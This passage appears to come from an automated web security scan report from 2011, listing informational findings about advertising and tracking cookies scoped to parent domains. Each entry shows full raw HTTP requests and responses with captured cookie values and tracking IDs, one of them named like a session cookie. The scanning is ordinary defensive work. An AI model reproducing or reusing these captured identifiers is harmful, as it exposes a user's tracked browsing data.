PbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:17 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:38:17 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.41. http://pix04.revsci.net/J06575/b3/0/3/1003161/807655569.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1003161/807655569.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1003161/807655569.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_gNkk=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; udm_0=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; 
rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; 
rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gNkk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: rtc_Siob=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:36:48 GMT; Path=/
Set-Cookie: NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf410&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Mon, 06-Jun-2011 15:36:48 GMT; Path=/
X-Proc-ms: 7
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:47 GMT
Content-Length: 939

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','J06575_10245','J06575_10396','D08734_72078','J06575_50073','J06575_50240','J06575_50735','J06575_50807','J06575_50822'];
...[SNIP]...

10.42. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=408c9df8-85fe-6893-4938-ccbfd204601e&rtb=2724386019227846218 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1304949602; i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:12 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25; expires=Wed, 08-May-2013 15:37:12 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.43. http://r1-ads.ace.advertising.com/site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=786652/size=728090/u=2/bnum=46632794/hr=10/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.usatoday.com%252Fweather%252Ffloods%252F2011-05-02-ohio-mississippi-river-floods_n.htm HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=BUGCI3kAAAAAYm1CAEAA+DABAAAABAAAAIAA+DA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAno2C+ORAgA1G!; C2=foAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NX8bLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:38:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981604.786652.0XMC
Set-Cookie: C2=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; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: ROLL=boAnr2C+ORAgA1G9JNnz8yH!; domain=advertising.com; expires=Wed, 08-May-2013 15:38:12 GMT; path=/
Set-Cookie: 46632794=_4dc80a64,1210252042,786652^981604^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 09 May 2011 15:38:12 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0000981
...[SNIP]...

10.44. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39531&partnerID=226&clientID=4716&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjjl0gZcefgJT9Cwcy975nBDKnGwOZc34wAcl3B5iBZGcHM1B4ogqQORcozMTBATRyJ9C+u7eOgO17sRukYGMxkPnkAsjMt7tB+k6CzbjwHUQeOgIiZ4JFmv+DbeQAMpv+gwTudYL07/cDMi/uBQms3Q8y5eU+JgCPhUHM"; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; 
io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:31:19 GMT
Set-Cookie: segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw==";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 08-May-2012 15:31:19 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1114604&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


10.45. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544434

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segs.btrll.com
Path:   /v1/tpix/-/-/-/-/-/sid.6544434

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/tpix/-/-/-/-/-/sid.6544434 HTTP/1.1
Host: segs.btrll.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1Nk

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:38:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: BR_MBBV=Ak2t54ZK4gSTAbNTSdI; expires=Mon, 07-May-2012 15:38:26 GMT; path=/; domain=.btrll.com
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: DRN1=AGPX0VFwToYAY9jFTmLU2QBj2O5OYtTZAGPYv05i1NkAY9wyTj6xcg; expires=Wed, 08-May-2013 15:38:26 GMT; path=/; domain=.btrll.com
Location: http://cache.btrll.com/default/Pix-1x1.gif
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


10.46. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Stats/Tracker.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Stats/Tracker.gif?plckUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckUserId=null&plckGcid=Pluck4&plckCurrentTime=1304955414035 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Content-Encoding: deflate
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:37:00 GMT
Connection: close


10.47. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/sys/jsonp.app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

